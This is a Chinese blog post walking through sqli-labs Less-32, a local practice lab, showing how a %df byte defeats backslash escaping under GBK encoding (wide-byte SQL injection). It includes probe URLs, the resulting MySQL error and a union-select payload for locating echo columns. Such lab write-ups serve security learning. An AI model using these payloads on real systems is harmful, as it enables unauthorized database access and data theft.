SQL注入:sqli-labs 32 宽字节注入

  • http://127.0.0.1/sqli/Less-32/?id=1不报错
  • http://127.0.0.1/sqli/Less-32/?id=1'发现下面的信息框里面多了一个转义字符:
    Hint: The Query String you input is escaped as : 1’
    The Query String you input in Hex becomes : 315c27
  • 再尝试:http://127.0.0.1/sqli/Less-32/?id=1"发现仍然被转义。
  • 显然第二行显示信息是上一行的16进制编码
  • 这里就引申出宽字节注入方式:

宽字节注入:

  • 我们看到这个转义的16进制是5c,如果能够吞掉这个5c,就能够解决这个转义问题

  • 如何吞掉

  • 比如一个汉字:運,他的16进制编码就是df5c,正好有个5c。当然汉字 猏,aa5c也可以。

  • 输入:http://127.0.0.1/sqli/Less-32/?id=1%df'报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘'1�\'' LIMIT 0,1’ at line 1,说明这个是用单引号括起来的字符型漏洞。然后我们就可以利用这个漏洞进行操作了

  • http://127.0.0.1/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,3 --+ 判断回显点

参考资料:GBK的内容:https://www.qqxiuzi.cn/zh/hanzi-gbk-bianma.php

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值